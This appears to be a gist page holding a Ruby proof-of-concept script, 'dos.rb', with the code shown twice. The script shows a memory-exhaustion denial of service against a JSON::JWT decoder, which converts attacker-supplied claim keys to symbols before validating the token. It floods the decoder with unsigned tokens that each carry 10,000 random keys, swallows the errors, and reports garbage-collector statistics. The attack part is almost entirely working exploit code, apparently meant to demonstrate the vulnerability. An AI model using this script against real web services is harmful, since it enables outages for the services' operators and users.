stouset/dos.rb Secret

## dos.rb
p GC.stat # note heap_used, heap_length, and particularly heap_live_num

random = Random.new
key    = random.bytes(256 / 8)

10_000.times do
  # construct a hash with 10_000 garbage keys; they can be strings here and the
  # JWT decoder will happily convert them to symbols regardless
  claims = 10_000.times.each_with_object({}) do |_, h|
    h[ random.bytes(16) ] = 1
  end

  # convert it to a JWT; they don't even have to be signed, because the decoder
  # converts string keys to symbols before even validating the JWT
  jwt = JSON::JWT.new(claims)

  # we swallow errors because, in practice, an attacker can just repeatedly hit
  # your webserver endpoint and ignore the fact that you've failed to decode the
  # JWT
  JSON::JWT.decode(jwt.to_s, key) rescue nil
end

# let the above run as long as you feel like

GC.start

p GC.stat # note heap_used, heap_length, and particularly heap_live_num
	p GC.stat # note heap_used, heap_length, and particularly heap_live_num

	random = Random.new
	key = random.bytes(256 / 8)

	10_000.times do
	# construct a hash with 10_000 garbage keys; they can be strings here and the
	# JWT decoder will happily convert them to symbols regardless
	claims = 10_000.times.each_with_object({}) do \|_, h\|
	h[ random.bytes(16) ] = 1
	end

	# convert it to a JWT; they don't even have to be signed, because the decoder
	# converts string keys to symbols before even validating the JWT
	jwt = JSON::JWT.new(claims)

	# we swallow errors because, in practice, an attacker can just repeatedly hit
	# your webserver endpoint and ignore the fact that you've failed to decode the
	# JWT
	JSON::JWT.decode(jwt.to_s, key) rescue nil
	end

	# let the above run as long as you feel like

	GC.start

	p GC.stat # note heap_used, heap_length, and particularly heap_live_num